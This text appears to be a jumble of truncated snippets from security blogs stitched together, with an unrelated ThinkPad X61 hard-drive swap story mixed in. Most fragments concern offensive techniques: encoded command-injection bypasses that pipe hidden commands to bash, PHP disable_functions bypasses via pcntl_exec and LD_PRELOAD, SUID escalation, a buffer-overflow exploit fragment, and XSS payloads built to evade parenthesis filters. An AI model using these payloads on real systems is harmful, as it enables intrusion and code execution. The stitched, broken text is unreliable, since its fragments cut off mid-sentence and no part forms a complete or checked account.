. && whoami // whoami is not executed 0x02 Linux (case-sensitive) 2.1 Symbols and logical operators on Linux. On Linux, variables are referenced with $; the ; character marks the end of a command, and the next command runs whether or not the previous one succeeded...m$(sdf)i 2.4 Substring slicing on Linux (Linux is case-sensitive). On Linux the substring syntax is ${NAME:start:length}, the same as on Windows, so it is not repeated here; only the case sensitivity needs attention...cat flag.php -> \x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70 # Tested: this fails in the PHP ping environment. ...It succeeds on a Linux system: $(printf "\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70") {printf,"\x63\x61\x74\x20\...x66\x6c\x61\x67\x2e\x70\x68\x70"}|bash `{printf,"\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70"}`
Today I introduce a penetration-testing framework that I personally find very impressive: PentestDB (https://github.com/alpha1e0/pentestdb.git). Installation: PentestDB supports Windows/Linux...git clone https://github.com/alpha1e0/pentestdb.git Installing dependencies: the project's scripts depend on lxml; Linux systems usually ship lxml by default, and if it is missing it can be installed as follows...not needed on Linux. ...pen.py decode -t base64 5ZOI5ZOI pen.py decode -m utf8 aaa%E5%93%88%E5%93%88 pen.py encode -t hex "\x61...\x61\xe5\x93\x88\xe5\x93\x88" # guess the encoding pen.py decode -d "\x61\x61\xe5\x93\x88\xe5\x93\x88" I have only listed some of the commonly used functions
> pcntl_exec PHP 4 >= 4.2.0, PHP 5 on linux #/tmp/hack.sh #!/bin/bash ls -l / #exec.php
3. SUID privilege escalation. SUID stands for Set User ID; it is a Linux feature that lets a user execute a file with the permissions of a specified user. For example, the Linux ping command normally needs root privileges to open a raw network socket. ...On Linux this cookie value is called a canary. .../python import sys, socket EIP = "\xd1\xf2\xff\xbf" junk = "A"*732 NOP = "\x90" * 16 # msfvenom -p linux...
Scenario: the Lenovo X61 originally came with a 120G internal hard drive. I bought a Lenovo 320G external drive and wanted to put the 320G drive into the laptop and turn the original internal drive into an external one. ...Removing the drive caddy and the X61's internal 120G drive: place the laptop as in normal use, shut it down, close the lid, and turn the laptop over first. ...Problem: I have always installed operating systems from a bare machine; this X61 is quite something, with a recovery partition, a one-key recovery program and all sorts of odds and ends. How did it end up arranged like this? Strange... ...References: X61 drive replacement: the new drive will not boot after a TrueImage clone http://www.thinkpad.cn/forum/tid681542 ThinkPad classic problems compilation http:/
PHP's mail function calls the system program /usr/sbin/sendmail by default while it runs; if we can hijack the sendmail program and then trigger it through the mail function, we achieve our goal. Exploitation principle: LD_PRELOAD is a Linux...4. Using pcntl_exec to bypass disable_functions: pcntl is a Linux extension that supports multi-threaded operation in PHP. ...
filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux...; CPE: cpe:/o:linux:linux_kernel Service detection performed....Copy the code out, beautify it at https://beautifier.io/, and remove the HTML entities in it; this gives the following result javascript: (function() { var _0x4b18 = [...
Navicat counterattack 5.1 Preparing the conditions for the counterattack. Environment: Navicat 12 trial version; attacker machine: Linux; target machines: Windows Server 2012, Windows 10. Required condition: a normally installed version of Navicat...Using the portable (no-install) version of Navicat (mind copyright; support genuine software). Of course, some questions remain that I have not studied in detail for lack of time, for example whether the MySQL command line on Linux can be counterattacked as well?
; $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput 3. The Pcntl component: pcntl is PHP's ... on Linux...linked and packaged into the executable together with the referenced libraries, hence static linking. Dynamic linking: in the static case the library is loaded directly into the program, whereas with dynamic linking only the interface is kept and the dynamic library stays separate from the program code. (2) LD_PRELOAD: LD_PRELOAD is a Linux
(1))(1) jQuery.globalEval(location.hash.slice(1)) document.write`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61...x63\x72\x69\x70\x74\x3e` document.getElementById('xx').innerHTML=`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61...\x63\x72\x69\x70\x74\x3e` 0x03 Methods for executing an arbitrary payload when parentheses are filtered document.write`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61...x6D;g src=x onerror=a...x6C;ert(document.doma
Installation: download the latest release from here, or clone it locally with git clone https://github.com/alpha1e0/pentestdb.git. PentestDB supports Windows/Linux.../MacOS and requires Python 2.6.x or 2.7.x to run. 2.1 Resolving the lxml dependency: the project's scripts depend on lxml; Linux systems usually ship lxml by default, and if it is missing it can be installed as follows: pip install...pen.py decode -t base64 5ZOI5ZOI pen.py decode -m utf8 aaa%E5%93%88%E5%93%88 pen.py encode -t hex "\x61...\x61\xe5\x93\x88\xe5\x93\x88" # guess the encoding pen.py decode -d "\x61\x61\xe5\x93\x88\xe5\x93\x88" 3.1.10 File-handling functions